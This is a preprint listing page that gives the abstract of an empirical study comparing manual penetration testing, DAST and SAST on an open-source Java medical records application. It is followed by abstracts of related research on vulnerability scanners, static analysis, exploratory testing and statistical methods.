Preprint

Do I really need all this work to find vulnerabilities? An empirical case study comparing vulnerability detection techniques on a Java application

Authors:
Preprints and early-stage research may not have been peer reviewed yet.
To read the file of this research, you can request a copy directly from the authors.

Abstract

CONTEXT: Applying vulnerability detection techniques is one of many tasks using the limited resources of a software project. OBJECTIVE: The goal of this research is to assist managers and other decision-makers in making informed choices about the use of software vulnerability detection techniques through an empirical study of the efficiency and effectiveness of four techniques on a Java-based web application. METHOD: We apply four different categories of vulnerability detection techniques \textendash~ systematic manual penetration testing (SMPT), exploratory manual penetration testing (EMPT), dynamic application security testing (DAST), and static application security testing (SAST) \textendash\ to an open-source medical records system. RESULTS: We found the most vulnerabilities using SAST. However, EMPT found more severe vulnerabilities. With each technique, we found unique vulnerabilities not found using the other techniques. The efficiency of manual techniques (EMPT, SMPT) was comparable to or better than the efficiency of automated techniques (DAST, SAST) in terms of Vulnerabilities per Hour (VpH). CONCLUSIONS: The vulnerability detection technique practitioners should select may vary based on the goals and available resources of the project. If the goal of an organization is to find "all" vulnerabilities in a project, they need to use as many techniques as their resources allow.

No file available

Request Full-text Paper PDF

To read the file of this research,
you can request a copy directly from the authors.

ResearchGate has not been able to resolve any citations for this publication.
Conference Paper
Full-text available
Organizational security teams have begun to specialize, and as a result, the existence of red, blue, and purple teams have been used as signals for an organization's security maturity. There is also now a rise in the use of third-party contractors who offer services such as incident response or penetration testing. Additionally, bug bounty programs are not only gaining popularity, but also are perceived as cost-effective replacements for internal security teams. Due to the many strategies to secure organizations, determining which strategy is best suited for a given situation may be a difficult task. To understand how these varying strategies are applied in practice and to understand non-technical challenges faced by professionals , we conducted 53 interviews with security practitioners in technical and managerial roles tasked with vulnerability discovery or management. We found that organizations often struggle with vulnerability remediation and that vulnerability discovery efforts are hindered by significant trust, communication , funding, and staffing issues. Based on our findings, we offer recommendations for how organizations can better apply these strategies.
Article
Full-text available
Web vulnerability scanners (WVSs) are tools that can detect security vulnerabilities in web services. Although both commercial and open‐source WVSs exist, their vulnerability detection capability and performance vary. In this article, we report on a comparative study to determine the vulnerability detection capabilities of eight WVSs (both open and commercial) using two vulnerable web applications: WebGoat and Damn vulnerable web application. The eight WVSs studied were: Acunetix; HP WebInspect; IBM AppScan; OWASP ZAP; Skipfish; Arachni; Vega; and Iron WASP. The performance was evaluated using multiple evaluation metrics: precision; recall; Youden index; OWASP web benchmark evaluation; and the web application security scanner evaluation criteria. The experimental results show that, while the commercial scanners are effective in detecting security vulnerabilities, some open‐source scanners (such as ZAP and Skipfish) can also be effective. In summary, this study recommends improving the vulnerability detection capabilities of both the open‐source and commercial scanners to enhance code coverage and the detection rate, and to reduce the number of false‐positives.
Article
Full-text available
As web applications become more prevalent, web security becomes more and more important. Cross-site scripting vulnerability abbreviated as XSS is a kind of common injection web vulnerability. The exploitation of XSS vulnerabilities can hijack users' sessions, modify, read and delete business data of web applications, place malicious codes in web applications, and control victims to attack other targeted servers. This paper discusses classification of XSS, and designs a demo website to demonstrate attack processes of common XSS exploitation scenarios. The paper also compares and analyzes recent research results on XSS detection, divides them into three categories according to different mechanisms. The three categories are static analysis methods, dynamic analysis methods and hybrid analysis methods. The paper classifies 30 detection methods into above three categories, makes overall comparative analysis among them, lists their strengths and weaknesses and detected XSS vulnerability types. In the end, the paper explores some ways to prevent XSS vulnerabilities from being exploited.
Conference Paper
Full-text available
Static analysis tool alerts can help developers detect potential defects in the code early in the development cycle. However, developers are not always able to respond to the alerts with their preferred action and may turn away from using the tool. In this paper, we qualitatively analyze 280 Stack Overflow (SO) questions regarding static analysis tool alerts to identify the challenges developers face in understanding and responding to these alerts. We find that the most prevalent question on SO is how to ignore and filter alerts, followed by validation of false positives. Our findings confirm prior researchers' findings related to notification communication theory as 44.6% of the SO questions that we analyzed indicate developers face communication challenges.
Conference Paper
Full-text available
Identifying security vulnerabilities in software is a critical task that requires significant human effort. Currently, vulnerability discovery is often the responsibility of software testers before release and white-hat hackers (often within bug bounty programs) afterward. This arrangement can be ad-hoc and far from ideal; for example, if testers could identify more vulnerabilities, software would be more secure at release time. Thus far, however, the processes used by each group — and how they compare to and interact with each other — have not been well studied. This paper takes a first step toward better understanding, and eventually improving, this ecosystem: we report on a semi-structured interview study (n=25) with both testers and hackers, focusing on how each group finds vulnerabilities, how they develop their skills, and the challenges they face. The results suggest that hackers and testers follow similar processes, but get different results due largely to differing experiences and therefore different underlying knowledge of security concepts. Based on these results, we provide recommendations to support improved security training for testers, better communication between hackers and developers, and smarter bug bounty policies to motivate hacker participation.
Conference Paper
Full-text available
Security testing can broadly be described as (1) the testing of security requirements that concerns confidentiality, integrity, availability, authentication, authorization, nonrepudiation and (2) the testing of the software to validate how much it can withstand an attack. Agile testing involves immediately integrating changes into the main system, continuously testing all changes and updating test cases to be able to run a regression test at any time to verify that changes have not broken existing functionality. Software companies have a challenge to systematically apply security testing in their processes nowadays. There is a lack of guidelines in practice as well as empirical studies in real-world projects on agile security testing; industry in general needs a more systematic approach to security. The findings of this research are not surprising, but at the same time are alarming. The lack of knowledge on security by agile teams in general, the large dependency on incidental pen-testers, and the ignorance in static testing for security are indicators that security testing is highly under addressed and that more efforts should be addressed to security testing in agile teams.
Article
Full-text available
Context: There have been many changes in statistical theory in the past 30 years, including increased evidence that non-robust methods may fail to detect important results. The statistical advice available to software engineering researchers needs to be updated to address these issues. Objective: This paper aims both to explain the new results in the area of robust analysis methods and to provide a large-scale worked example of the new methods. Method: We summarise the results of analyses of the Type 1 error efficiency and power of standard parametric and non-parametric statistical tests when applied to non-normal data sets. We identify parametric and non-parametric methods that are robust to non-normality. We present an analysis of a large-scale software engineering experiment to illustrate their use. Results: We illustrate the use of kernel density plots, and parametric and non-parametric methods using four different software engineering data sets. We explain why the methods are necessary and the rationale for selecting a specific analysis. Conclusion: We suggest using kernel density plots rather than box plots to visualise data distributions. For parametric analysis, we recommend trimmed means, which can support reliable tests of the differences between the central location of two or more samples. When the distribution of the data differs among groups, or we have ordinal scale data, we recommend non-parametric methods such as Cliff's δ\delta or a robust rank-based ANOVA-like method.
Conference Paper
Full-text available
Security tools can help developers answer questions about potential vulnerabilities in their code. A better understanding of the types of questions asked by developers may help toolsmiths design more effective tools. In this paper, we describe how we collected and categorized these questions by conducting an exploratory study with novice and experienced software developers. We equipped them with Find Security Bugs, a security-oriented static analysis tool, and observed their interactions with security vulnerabilities in an open-source system that they had previously contributed to. We found that they asked questions not only about security vulnerabilities, associated attacks, and fixes, but also questions about the software itself, the social ecosystem that built the software, and related resources and tools. For example, when participants asked questions about the source of tainted data, their tools forced them to make imperfect tradeoffs between systematic and ad hoc program navigation strategies.
Article
Full-text available
There is little or no information available on what actually happens when a software vulnerability is detected. We performed an empirical study on reporters of the three most prominent security vulnerabilities: buffer overflow, SQL injection, and cross site scripting vulnerabilities. The goal was to understand the methods and tools used during the discovery and whether the community of developers exploring one security vulnerability differs—in their approach—from another community of developers exploring a different vulnerability. The reporters were featured in the SecurityFocus repository for twelve month periods for each vulnerability. We collected 127 responses. We found that the communities differ based on the security vulnerability they target; but within a specific community, reporters follow similar approaches. We also found a serious problem in the vulnerability reporting process that is common for all communities. Most reporters, especially the experienced ones, favor full-disclosure and do not collaborate with the vendors of vulnerable software. They think that the public disclosure, sometimes supported by a detailed exploit, will put pressure on vendors to fix the vulnerabilities. But, in practice, the vulnerabilities not reported to vendors are less likely to be fixed. Ours is the first study on vulnerability repositories that targets the reporters of the most common security vulnerabilities, thus concentrating on the people involved in the process; previous works have overlooked this rich information source. The results are valuable for beginners exploring how to detect and report security vulnerabilities and for tool vendors and researchers exploring how to automate and fix the process.
Article
Full-text available
The importance of normal distribution is undeniable since it is an underlying assumption of many statistical procedures such as t-tests, linear regression analysis, discriminant analysis and Analysis of Variance (ANOVA). When the normality assumption is violated, interpretation and inferences may not be reliable or valid. The three common procedures in assessing whether a random sample of independent observations of size n come from a population with a normal distribution are: graphical methods (histograms, boxplots, Q-Q-plots), numerical methods (skewness and kurtosis indices) and formal normality tests. This paper* compares the power of four formal tests of normality: Shapiro-Wilk (SW) test, Kolmogorov-Smirnov (KS) test, Lilliefors (LF) test and Anderson-Darling (AD) test. Power comparisons of these four tests were obtained via Monte Carlo simulation of sample data generated from alternative distributions that follow symmetric and asymmetric distributions. Ten thousand samples of various sample size were generated from each of the given alternative symmetric and asymmetric distributions. The power of each test was then obtained by comparing the test of normality statistics with the respective critical values. Results show that Shapiro-Wilk test is the most powerful normality test, followed by Anderson-Darling test, Lilliefors test and Kolmogorov-Smirnov test. However, the power of all four tests is still low for small sample size.
Conference Paper
Full-text available
Context: Exploratory Testing has experienced a rise in popularity in the industry with the emergence of agile development practices, yet it remains unclear, in which domains and how it is used in practice. Objective: To study how software engineers understand and apply the principles of exploratory testing, as well as the specific advantages and difficulties they experience. Method: We conducted an online survey in the period June to August 2013 among Estonian and Finnish software developers and testers. Results: Our main findings are that the majority of testers, developers, and test managers using ET, (1) apply ET to usability-critical, performance-critical, security-critical and safety-critical software to a high degree; (2) use ET very flexibly in all types of test levels, activities, and phases; (3) perceive ET as an approach that supports creativity during testing and that is effective and efficient; and (4) find that ET is not easy to use and has little tool support. Conclusion: The high degree of application of ET in critical domains is particularly interesting and indicates a need for future research to obtain a better understanding of the effects of ET in these domains. In addition, our findings suggest that more support to ET users should be given (guidance and tools).
Article
Full-text available
Manual software testing is a widely practiced verification and validation method that is unlikely to fade away despite the advances in test automation. In the domain of manual testing, many practitioners advocate exploratory testing (ET), i.e., creative, experience-based testing without predesigned test cases, and they claim that it is more efficient than testing with detailed test cases. This paper reports a replicated experiment comparing effectiveness, efficiency, and perceived differences between ET and test-case-based testing (TCT) using 51 students as subjects, who performed manual functional testing on the jEdit text editor. Our results confirm the findings of the original study: 1) there is no difference in the defect detection effectiveness between ET and TCT, 2) ET is more efficient by requiring less design effort, and 3) TCT produces more false-positive defect reports than ET. Based on the small differences in the experimental design, we also put forward a hypothesis that the effectiveness of the TCT approach would suffer more than ET from time pressure. We also found that both approaches had distinctive issues: in TCT, the problems were related to correct abstraction levels of test cases, and the problems in ET were related to test design and logging of the test execution and results. Finally, we recognize that TCT has other benefits over ET in managing and controlling testing in large organizations.
Article
Full-text available
We present a field study on how testers use knowledge while performing exploratory software testing (ET) in industrial settings. We video recorded 12 testing sessions in four industrial organizations, having our subjects think aloud while performing their usual functional testing work. Using applied grounded theory, we analyzed how the subjects performed tests and what type of knowledge they utilized. We discuss how testers recognize failures based on their personal knowledge without detailed test case descriptions. The knowledge is classified under the categories of domain knowledge, system knowledge, and general software engineering knowledge. We found that testers applied their knowledge either as a test oracle to determine whether a result was correct or not, or for test design, to guide them in selecting objects for test and designing tests. Interestingly, a large number of failures, windfall failures, were found outside the actual focus areas of testing as a result of exploratory investigation. We conclude that the way exploratory testers apply their knowledge for test design and failure recognition differs clearly from the test-case-based paradigm and is one of the explanatory factors of the effectiveness of the exploratory testing approach.
Conference Paper
Full-text available
Vulnerability detection tools are frequently considered the silver-bullet for detecting vulnerabilities in web services. However, research shows that the effectiveness of most of those tools is very low and that using the wrong tool may lead to the deployment of services with undetected vulnerabilities. In this paper we propose a benchmarking approach to assess and compare the effectiveness of vulnerability detection tools in web services environments. This approach was used to define a concrete benchmark for SQL Injection vulnerability detection tools. This benchmark is demonstrated by a real example of benchmarking several widely used tools, including four penetration-testers, three static code analyzers, and one anomaly detector. Results show that the benchmark accurately portrays the effectiveness of vulnerability detection tools and suggest that the proposed approach can be applied in the field.
Conference Paper
Full-text available
Web services are becoming business-critical components that must provide a non-vulnerable interface to the client applications. However, previous research and practice show that many web services are deployed with critical vulnerabilities. SQL injection vulnerabilities are particularly relevant, as Web services frequently access a relational database using SQL commands. Penetration testing and static code analysis are two well-know techniques often used for the detection of security vulnerabilities. In this work we compare how effective these two techniques are on the detection of SQL injection vulnerabilities in Web services code. To understand the strengths and limitations of these techniques, we used several commercial and open source tools to detect vulnerabilities in a set of vulnerable services. Results suggest that, in general, static code analyzers are able to detect more SQL injection vulnerabilities than penetration testing tools. Another key observation is that tools implementing the same detection approach frequently detect different vulnerabilities. Finally, many tools provide a low coverage and a high false positives rate, making them a bad option for programmers.
Conference Paper
Full-text available
Replications play an important role in verifying empirical results. In this paper, we discuss our experiences performing a literal replication of a human subjects experiment that examined the relationship between a simple test for consis- tent use of mental models, and success in an introductory programming course. We encountered many diculties in achieving comparability with the original experiment, due to a series of apparently minor dierences in context. Based on this experience, we discuss the relative merits of replication, and suggest that, for some human subjects studies, literal replication may not be the the most eective strategy for validating the results of previous studies. Categories and Subject Descriptors: A.m General Literature: MISCELLANEOUS General Terms: Experimentation
Conference Paper
Full-text available
Black-box web vulnerability scanners are a class of tools that can be used to identify security issues in web applications. These tools are often marketed as “point-and-click pentesting” tools that automatically evaluate the security of web applications with little or no human support. These tools access a web application in the same way users do, and, therefore, have the advantage of being independent of the particular technology used to implement the web application. However, these tools need to be able to access and test the application’s various components, which are often hidden behind forms, JavaScript-generated links, and Flash applications. This paper presents an evaluation of eleven black-box web vulnerability scanners, both commercial and open-source. The evaluation composes different types of vulnerabilities with different challenges to the crawling capabilities of the tools. These tests are integrated in a realistic web application. The results of the evaluation show that crawling is a task that is as critical and challenging to the overall ability to detect vulnerabilities as the vulnerability detection techniques themselves, and that many classes of vulnerabilities are completely overlooked by these tools, and thus research is required to improve the automated detection of these flaws.
Conference Paper
Full-text available
The serious bugs and security vulnerabilities facilitated by C/C++'s lack of bounds checking are well known, yet C and C++ remain in widespread use. Unfortunately, C's arbitrary pointer arithmetic, conflation of pointers and arrays, and programmer-visible memory layout make retrofitting C/C++ with spatial safety guarantees extremely challenging. Existing approaches suffer from incompleteness, have high runtime overhead, or require non-trivial changes to the C source code. Thus far, these deficiencies have prevented widespread adoption of such techniques. This paper proposes SoftBound, a compile-time transformation for enforcing spatial safety of C. Inspired by HardBound, a previously proposed hardware-assisted approach, SoftBound similarly records base and bound information for every pointer as disjoint metadata. This decoupling enables SoftBound to provide spatial safety without requiring changes to C source code. Unlike HardBound, SoftBound is a software-only approach and performs metadata manipulation only when loading or storing pointer values. A formal proof shows that this is sufficient to provide spatial safety even in the presence of arbitrary casts. SoftBound's full checking mode provides complete spatial violation detection with 67% runtime overhead on average. To further reduce overheads, SoftBound has a store-only checking mode that successfully detects all the security vulnerabilities in a test suite at the cost of only 22% runtime overhead on average.
Article
Full-text available
Various statistical methods, developed after 1970, offer the opportunity to substantially improve upon the power and accuracy of the conventional t test and analysis of variance methods for a wide range of commonly occurring situations. The authors briefly review some of the more fundamental problems with conventional methods based on means; provide some indication of why recent advances, based on robust measures of location (or central tendency), have practical value; and describe why modern investigations dealing with nonnormality find practical problems when comparing means, in contrast to earlier studies. Some suggestions are made about how to proceed when using modern methods.
Conference Paper
Full-text available
Web applications are typically developed with hard time constraints and are often deployed with security vulnerabilities. Automatic web vulnerability scanners can help to locate these vulnerabilities and are popular tools among developers of web applications. Their purpose is to stress the application from the attacker's point of view by issuing a huge amount of interaction within it. Two of the most widely spread and dangerous vulnerabilities in web applications are SQL injection and cross site scripting (XSS), because of the damage they may cause to the victim business. Trusting the results of web vulnerability scanning tools is of utmost importance. Without a clear idea on the coverage and false positive rate of these tools, it is difficult to judge the relevance of the results they provide. Furthermore, it is difficult, if not impossible, to compare key figures of merit of web vulnerability scanners. In this paper we propose a method to evaluate and benchmark automatic web vulnerability scanners using software fault injection techniques. The most common types of software faults are injected in the web application code which is then checked by the scanners. The results are compared by analyzing coverage of vulnerability detection and false positives. Three leading commercial scanning tools are evaluated and the results show that in general the coverage is low and the percentage of false positives is very high.
Conference Paper
Full-text available
Buffer overflows have been the most common form of security vulnerability for the last ten years. Moreover, buffer overflow vulnerabilities dominate the area of remote network penetration vulnerabilities, where an anonymous Internet user seeks to gain partial or total control of a host. If buffer overflow vulnerabilities could be effectively eliminated, a very large portion of the most serious security threats would also be eliminated. We survey the various types of buffer overflow vulnerabilities and attacks and survey the various defensive measures that mitigate buffer overflow vulnerabilities, including our own StackGuard method. We then consider which combinations of techniques can eliminate the problem of buffer overflow vulnerabilities, while preserving the functionality and performance of existing systems
Article
Context Cognitive load in software engineering refers to the mental effort users spend while reading software artifacts. The cognitive load can vary according to tasks and across developers. Researchers have measured developers’ cognitive load for different purposes, such as understanding its impact on productivity and software quality. Thus, researchers and practitioners can use cognitive load measures for solving many aspects of software engineering problems. Problem However, a lack of a classification of dimensions about cognitive load measures in software engineering turns difficult for researchers and practitioners to obtain research trends to advance in scientific knowledge or to apply it in software projects. Objective This article aims to provide a classification of different aspects of cognitive load measures in software engineering and identify challenges for further research from classified works. Method We conducted a Systematic Mapping Study (SMS), which started with 4,175 articles gathered from 11 search engines and then narrowed down to 63 primary studies. Results Our main findings are: (1) 62% (39/63) focused on applying a combination of sensors; (2) 81% (51/63) of the selected works were validation studies; (3) 83% (52/63) analyzed the cognitive load while developers performed programming tasks. Moreover, the research questions’ answers formed a classification scheme. Conclusion Finally, despite the production of a significant amount of studies on cognitive load in software engineering by academia, there are still many challenges to be solved by the academia and practitioners for effectively measuring the cognitive load in software engineering. For this, this study provided directions for future studies about cognitive load in the field of software engineering for academia and practitioners.
Article
Buffer overflow (BO) is a well-known and widely exploited security vulnerability. Despite the extensive body of research, BO is still a threat menacing security-critical applications. The authors present a comprehensive systematic review on techniques intended to detecting BO vulnerabilities before releasing a software to production. They found that most of the studies addresses several vulnerabilities or memory errors, being not specific to BO detection. The authors organized them in seven categories: program analysis, testing, computational intelligence, symbolic execution, models, and code inspection. Program analysis, testing and code inspection techniques are available for use by the practitioner. However, program analysis adoption is hindered by the high number of false alarms; testing is broadly used but in ad hoc manner; and code inspection can be used in practice provided it is added as a task of the software development process. New techniques combining object code analysis with techniques from different categories seem a promising research avenue towards practical BO detection.
Conference Paper
Fuzz testing has enjoyed great success at discovering security critical bugs in real software. Recently, researchers have devoted significant effort to devising new fuzzing techniques, strategies, and algorithms. Such new ideas are primarily evaluated experimentally so an important question is: What experimental setup is needed to produce trustworthy results? We surveyed the recent research literature and assessed the experimental evaluations carried out by 32 fuzzing papers. We found problems in every evaluation we considered. We then performed our own extensive experimental evaluation using an existing fuzzer. Our results showed that the general problems we found in existing experimental evaluations can indeed translate to actual wrong or misleading assessments. We conclude with some guidelines that we hope will help improve experimental evaluations of fuzz testing algorithms, making reported results more robust.
Conference Paper
Construct validity is essentially the degree to which our scales, metrics and instruments actually measure the properties they are supposed to measure. Although construct validity is widely considered an important quality criterion for most empirical research, many software engineering studies simply assume that proposed measures are valid and make no attempt to assess construct validity. Researchers may ignore construct validity because evaluating it is intrinsically difficult, or due to lack of specific guidance for addressing it. In any case, some research inevitably produces erroneous conclusions, because due to invalid measures. This article therefore attempts to address these problems by explaining the theoretical basis of construct validity, presenting a framework for understanding it, and developing specific guidelines for assessing it. The paper draws on a detailed example involving 15 software metrics, which ostensibly measure the size, coupling and cohesion of Java classes.
Article
Context: Practitioners establish a piece of software's security objectives during the software development process. To support control and assessment, practitioners and researchers seek to measure security risks and mitigations during software development projects. Metrics provide one means for assessing whether software security objectives have been achieved. A catalog of security metrics for the software development life cycle could assist practitioners in choosing appropriate metrics, and researchers in identifying opportunities for refinement of security measurement. Objective: The goal of this research is to support practitioner and researcher use of security measurement in the software life cycle by cataloging security metrics presented in the literature, their validation, and the subjects they measure. Method: We conducted a systematic mapping study, beginning with 4818 papers and narrowing down to 71 papers reporting on 324 unique security metrics. For each metric, we identified the subject being measured, how the metric has been validated, and how the metric is used. We categorized the metrics, and give examples of metrics for each category. Results: In our data, 85% of security metrics have been proposed and evaluated solely by their authors, leaving room for replication and confirmation through field studies. Approximately 60% of the metrics have been empirically evaluated, by their authors or by others. The available metrics are weighted heavily toward the implementation and operations phases, with relatively few metrics for requirements, design, and testing phases of software development. Some artifacts and processes remain unmeasured. Measured by phase, Testing received the least attention, with 1.5% of the metrics. Conclusions: At present, the primary application of security metrics to the software development life cycle in the literature is to study the relationship between properties of source code and reported vulnerabilities. The most-cited and most used metric, vulnerability count, has multiple definitions and operationalizations. We suggest that researchers must check vulnerability count definitions when making comparisons between papers. In addition to refining vulnerability measurement, we see research opportunities for greater attention to metrics for the requirement, design, and testing phases of development. We conjecture from our data that the field of software life cycle security metrics has yet to converge on an accepted set of metrics.
Chapter
The experiment data from the operation is input to the analysis and interpretation. After collecting experimental data in the operation phase, we want to be able to draw conclusions based on this data. To be able to draw valid conclusions, we must interpret the experiment data.
Conference Paper
We perform an empirical study to better understand two well-known vulnerability rewards programs, or VRPs, which software vendors use to encourage community participation in finding and responsibly disclosing software vulnerabilities. The Chrome VRP has cost approximately 580,000over3yearsandhasresultedin501bountiespaidfortheidentificationofsecurityvulnerabilities.TheFirefoxVRPhascostapproximately580,000 over 3 years and has resulted in 501 bounties paid for the identification of security vulnerabilities. The Firefox VRP has cost approximately 570,000 over the last 3 years and has yielded 190 bounties. 28% of Chrome's patched vulnerabilities appearing in security advisories over this period, and 24% of Firefox's, are the result of VRP contributions. Both programs appear economically efficient, comparing favorably to the cost of hiring full-time security researchers. The Chrome VRP features low expected payouts accompanied by high potential payouts, while the Firefox VRP features fixed payouts. Finding vulnerabilities for VRPs typically does not yield a salary comparable to a full-time job; the common case for recipients of rewards in either program is that they have received only one reward. Firefox has far more critical-severity vulnerabilities than Chrome, which we believe is attributable to an architectural difference between the two browsers.
Conference Paper
Suppose you have to assemble a security team, which is tasked with performing the security analysis of your organization's latest applications. After researching how to assess your applications, you find that the most popular techniques (also offered by most security consultancies) are automated static analysis and black box penetration testing. Under time and budget constraints, which technique would you use first? This paper compares these two techniques by means of an exploratory controlled experiment, in which 9 participants analyzed the security of two open source blogging applications. Despite its relative small size, this study shows that static analysis finds more vulnerabilities and in a shorter time than penetration testing.
Conference Paper
Capturing attacker behavior in a security test plan allows the systematic, repeated assessment of a system's defenses against attacks. To address the lack of security experts capable of developing effective black box security test plans, we have empirically developed an initial set of six black box security test patterns. These patterns capture the expertise involved in creating a black box security test plan in the same way that software design patterns capture design expertise. Security test patterns can enable software testers lacking security expertise (in this paper, "novices") to develop a test plan the way experts could. The goal of this paper is to evaluate the ability of novices to effectively generate black box security tests by accessing security expertise contained within security test patterns. We conducted a user study of 47 student novices, who used our six initial patterns to develop black box security test plans for six requirements from a publicly available specification for electronic health records systems. We created an oracle for the security test plan by forming a panel of researchers who manually completed the same task as the novices. We found that novices will generate a similar black box test plan to the oracle when aided by the six black box security test patterns.
Conference Paper
Using static analysis tools for automating code inspections can be beneficial for software engineers. Such tools can make finding bugs, or software defects, faster and cheaper than manual inspections. Despite the benefits of using static analysis tools to find bugs, research suggests that these tools are underused. In this paper, we investigate why developers are not widely using static analysis tools and how current tools could potentially be improved. We conducted interviews with 20 developers and found that although all of our participants felt that use is beneficial, false positives and the way in which the warnings are presented, among other things, are barriers to use. We discuss several implications of these results, such as the need for an interactive mechanism to help developers fix defects.
Article
Although it has long been a consensus that intercoder reliability is crucial to the validity of a content analysis study, the choice among them has been debated. This study reviewed and empirically tested most popular intercoder reliability indices, aiming to find the most robust index against prevalence and rater bias, by empirically testing their relationships with response surface methodology through a Monte Carlo experiment. It was found that Maxwell’s R.E is superior to Krippendorff’s α, Scott’s π, Cohen’s κ, I r of Perreault and Leigh, and Gwet’s AC 1. More nuanced relationships among prevalence, sensitivity, specificity and the intercoder reliability indices were discovered through response surface plots. Both theoretical and practical implications were also discussed in the end.
Article
ContextSecurity vulnerabilities discovered later in the development cycle are more expensive to fix than those discovered early. Therefore, software developers should strive to discover vulnerabilities as early as possible. Unfortunately, the large size of code bases and lack of developer expertise can make discovering software vulnerabilities difficult. A number of vulnerability discovery techniques are available, each with their own strengths.Objective The objective of this research is to aid in the selection of vulnerability discovery techniques by comparing the vulnerabilities detected by each and comparing their efficiencies.Method We conducted three case studies using three electronic health record systems to compare four vulnerability discovery techniques: exploratory manual penetration testing, systematic manual penetration testing, automated penetration testing, and automated static analysis.ResultsIn our case study, we found empirical evidence that no single technique discovered every type of vulnerability. We discovered that the specific set of vulnerabilities identified by one tool was largely orthogonal to that of other tools. Systematic manual penetration testing found the most design flaws, while automated static analysis found the most implementation bugs. The most efficient discovery technique in terms of vulnerabilities discovered per hour was automated penetration testing.Conclusion The results show that employing a single technique for vulnerability discovery is insufficient for finding all types of vulnerabilities. Each technique identified only a subset of the vulnerabilities, which, for the most part were independent of each other. Our results suggest that in order to discover the greatest variety of vulnerability types, at least systematic manual penetration testing and automated static analysis should be performed.
Article
1—In a previous paper*, dealing with the importance of properties of sufficiency in the statistical theory of small samples, attention was mainly confined to the theory of estimation. In the present paper the structure of small sample tests, whether these are related to problems of estimation and fiducial distributions, or are of the nature of tests of goodness of fit, is considered further.
Article
Three different methods for testing all pairs of YkYk\overline{{\rm Y}}_{\text{k}}-\overline{{\rm Y}}_{\text{k}}, were contrasted under varying sample size (n) and variance conditions. With unequal n's of six and up, only the Behrens-Fisher statistic provided satisfactory control of both the familywise rate of Type I errors and Type I error rate on each contrast. Satisfactory control with unequal n's of three and up is dubious even with this statistic.
Article
As a method specifically intended for the study of messages, content analysis is fundamental to mass communication research. Intercoder reliability, more specifically termed intercoder agreement, is a measure of the extent to which independent judges make the same coding decisions in evaluating the characteristics of messages, and is at the heart of this method. Yet there are few standard and accessible guidelines available regarding the appropriate procedures to use to assess and report intercoder reliability, or software tools to calculate it. As a result, it seems likely that there is little consistency in how this critical element of content analysis is assessed and reported in published mass communication studies. Following a review of relevant concepts, indices, and tools, a content analysis of 200 studies utilizing content analysis published in the communication literature between 1994 and 1998 is used to characterize practices in the field. The results demonstrate that mass communication researchers often fail to assess (or at least report) intercoder reliability and often rely on percent agreement, an overly liberal index. Based on the review and these results, concrete guidelines are offered regarding procedures for assessment and reporting of this important aspect of content analysis.
Conference Paper
Security experts use their knowledge to attempt attacks on an application in an exploratory and opportunistic way in a process known as penetration testing. However, building security into a product is the responsibility of the whole team, not just the security experts who are often only involved in the final phases of testing. Through the development of a black box security test plan, software testers who are not necessarily security experts can work proactively with the developers early in the software development lifecycle. The team can then establish how security will be evaluated such that the product can be designed and implemented with security in mind. The goal of this research is to improve the security of applications by introducing a methodology that uses the software system's requirements specification statements to systematically generate a set of black box security tests. We used our methodology on a public requirements specification to create 137 tests and executed these tests on five electronic health record systems. The tests revealed 253 successful attacks on these five systems, which are used to manage the clinical records for approximately 59 million patients, collectively. If non-expert testers can surface the more common vulnerabilities present in an application, security experts can attempt more devious, novel attacks.
Conference Paper
Summary form only given. Software security has come a long way in the last few years, but we've really only just begun. I will present a detailed approach to getting past theory and putting software security into practice. The three pillars of software security are applied risk management, software security best practices (which I call touchpoints), and knowledge. By describing a manageably small set of touchpoints based around the software artifacts that you already produce, I avoid religious warfare over process and get on with the business of software security. That means you can adopt the touchpoints without radically changing the way you work. The touchpoints I will describe include: code review using static analysis tools; architectural risk analysis; penetration testing; security testing; abuse case development; and security requirements. Like the yin and the yang, software security requires a careful balance-attack and defense, exploiting and designing, breaking and building-bound into a coherent package. Create your own Security Development Lifecycle by enhancing your existing software development lifecycle with the touchpoints
Article
An omnibus index offers a single summary expression for a fourfold table of binary concordance among two observers. Among the available other omnibus indexes, none offers a satisfactory solution for the paradoxes that occur with p0 and kappa. The problem can be avoided only by using ppos and pneg as two separate indexes of proportionate agreement in the observers' positive and negative decisions. These two indexes, which are analogous to sensitivity and specificity for concordance in a diagnostic marker test, create the paradoxes formed when the chance correction in kappa is calculated as a product of the increment in the two indexes and the increment in marginal totals. If only a single omnibus index is used to compared different performances in observer variability, the paradoxes of kappa are desirable since they appropriately "penalize" inequalities in ppos and pneg. For better understanding of results and for planning improvements in the observers' performance, however, the omnibus value of kappa should always be accompanied by separate individual values of ppos and pneg.
Article
DESMET was a DTI-backed project with the goal of developing and validating a methodology for evaluating software engineering methods and tools. The project identified nine methods of evaluation and a set of criteria to help evaluators select an appropriate method. Detailed guidelines were developed for three important evaluation methods: formal experiments, quantitative case studies and feature analysis evaluations. This article describes the way the DESMET project used the DESMET methodology both to evaluate the methodology itself and to provide direct assistance to the commercial organisations using it
Upgrade to superhuman reflexes without feeling like a robot
  • E Ackerman
Ackerman E (2019) Upgrade to superhuman reflexes without feeling like a robot. IEEE Spectrum URL https://spectrum.ieee.org/enablingsuperhuman-reflexes-without-feeling-like-a-robot